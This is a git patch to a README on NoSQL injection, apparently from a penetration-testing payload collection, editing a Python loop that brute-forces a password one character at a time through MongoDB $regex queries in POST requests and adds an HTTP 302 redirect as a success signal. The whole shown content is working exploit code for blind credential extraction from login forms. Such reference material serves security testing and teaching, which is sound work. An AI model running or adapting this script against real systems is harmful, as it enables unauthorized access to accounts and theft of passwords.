From 694e9e4dbd503eb80e9650eb5d8a6979826abb6c Mon Sep 17 00:00:00 2001
From: Reelix <reelix+github@gmail.com>
Date: Tue, 29 Oct 2019 21:11:56 +0200
Subject: [PATCH] Added an alternate possible Found condition to POST

---
 NoSQL Injection/README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md
index b52f6bf..7c203b8 100644
--- a/NoSQL Injection/README.md	
+++ b/NoSQL Injection/README.md	
@@ -89,8 +89,8 @@ while True:
     for c in string.printable:
         if c not in ['*','+','.','?','|']:
             payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
-            r = requests.post(u, data = payload, headers = headers, verify = False)
-            if 'OK' in r.text:
+            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
+            if 'OK' in r.text or r.status_code == 302:
                 print("Found one more char : %s" % (password+c))
                 password += c
 ```